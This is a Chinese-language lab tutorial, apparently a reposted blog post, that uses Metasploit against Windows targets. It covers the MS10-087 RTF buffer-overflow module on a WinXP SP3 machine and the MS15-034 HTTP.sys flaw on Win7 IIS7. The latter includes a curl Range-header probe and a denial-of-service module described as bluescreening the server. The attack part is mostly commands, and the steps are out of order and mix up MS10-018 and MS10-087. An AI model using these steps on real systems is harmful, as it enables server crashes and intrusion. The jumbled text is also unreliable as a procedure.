show options查看配置
我们让目标机访问下这个url,这时msfconsole中就出现了successfuully,我们按回车(这里我尝试了好久,每次靶机访问IE就跳出OD来,最后把靶机里面的OD删掉就好了)。
sessions -i 1进入会话
用到的靶机为:WinXPenSP3。
打开msfconsole
搜索下ms10-018的路径:search ms10-087。
使用这个模块:
Use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
执行show options配置环境
我们把文件名改成ceshi。我们设置现在让他弹出一个计算器:set CMD calc.exe。
显示隐藏文件找到生成文件
找到后利用刚刚ms10-018上传运行
(1)利用ms15-034漏洞读取服务器内存数据
(2)利用ms15-034漏洞进行ddos攻击
use auxiliary/dos/http/ms15_034_ulonglongadd //打开这个漏洞模块
set
rhosts 192.168.80.130//配置目标IP
set
threads 10//配置10个线程
run//运行
漏洞主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。IIS6.0以上。
靶机:win7 iis7
win7安装好iis服务后访问80端口,检测是否存在漏洞:使用curl发送以下数据
curl http://192.168.137.129 -H "Host: 192.168.137.129" -H "Range: bytes=0-18446744073709551615"
当出现Requested Range Not Satisfiable时说明存在漏洞。
使用metasploit的auxiliary/dos/http/ms15_034_ulonglongadd模块可直接造成服务器蓝屏,
使用auxiliary/scanner/http/ms15_034_http_sys_memory_dump模块检测时仅针对:windoiws 8.1, 2012, or 2012R2有效。
欢迎分享,转载请注明来源:夏雨云
评论列表(0条)